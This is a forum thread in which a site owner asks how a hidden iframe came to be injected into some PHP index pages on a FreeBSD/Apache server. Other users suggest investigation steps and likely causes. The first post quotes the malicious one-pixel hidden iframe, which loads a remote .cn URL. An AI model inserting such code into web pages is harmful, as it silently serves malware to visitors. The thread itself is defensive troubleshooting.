-
iframe worm or malware infected my php pages
Hi there,
Recently some users told me that their antivirus software prompts them when they visit my web site telling them that some malware is present.
Now my site was reported as suspicious and Firefox and IE block access to it. Google also suspended my adwords account.
After some researches I've found that someone/something inserted the code:
Code:
<iframe src="http://lotmachinesguide.cn/in.cgi?income58" width=1 height=1 style="visibility: hidden">
on some index.php files (not all of them) and only from one web site (on the server there are many websites hosted).
On the server runs Apache/2.2.11 (FreeBSD).
I've removed the code but the problem could reappear so I must get to the source: how was the code inserted, by whom and if the server is compromised?
Does anyone know something about this? What should I do further?
rkhunter and chkrootkit say that everything is ok.
Thanks you
Best regards,
ddaas
-
Should've looked at permissions for the file and ownership before changing it... that could tell you what account had rights to do it. I'd grep for the file name(s) in the various bash_history files, etc.
-
I'd venture to guess that it wasn't someone who had shell access to the server. It was probably brought in via an ftp client, either on purpose or one that was compromised. If you have another one you can check the modified time and look for ftp logs...
but really, i dont know what im talking about.
-
Originally Posted by ddaas
on some index.php files
Disable PHP?
You probably have some insecure page somewhere else (directory traversal, not securing access, something like that) which is allowing someone to add this HTML to all these pages. It's very likely one of your PHP scripts. If you disable PHP, I bet that will prevent any future occurrences of this.
Alternately, if this site has WebDAV enabled (...why?), then someone might have learned your username and password (...you do use one when using WebDAV, right?) and used that to modify the files. Disabling WebDAV would work, in that case.
If it was a script, and you can find out which script they used, you can either fix it, or upgrade it to a non-vulnerable version (...you *do* monitor the security lists for all the PHP stuff you have installed, right? third-party forum pages, blog software, and whatever else?). But finding that out might be hard. If you had the modification time of the various .php files (which you destroyed when you changed them again), you could try to correlate that with entries in the Apache logs (which would catch both WebDAV and problematic PHP stuff), but that's going to be hard now. Though it may have been impossible before as well, as the attacker may have been able to remove their log entries. Don't know for sure though.
There have been several rashes of automated compromises of various PHP-based webpage packages, about a year ago or so. (Various forums, various blog generaters, etc.) I've stopped paying attention since then, since I've sworn off PHP entirely. Wouldn't surprise me if someone found that your site used some vulnerable version of some PHP thing (via some search engine, is how they did it last year), and used that vulnerability to compromise the server.
Posting Permissions
- You may not post new threads
- You may not post replies
- You may not post attachments
- You may not edit your posts
-
Forum Rules
|
|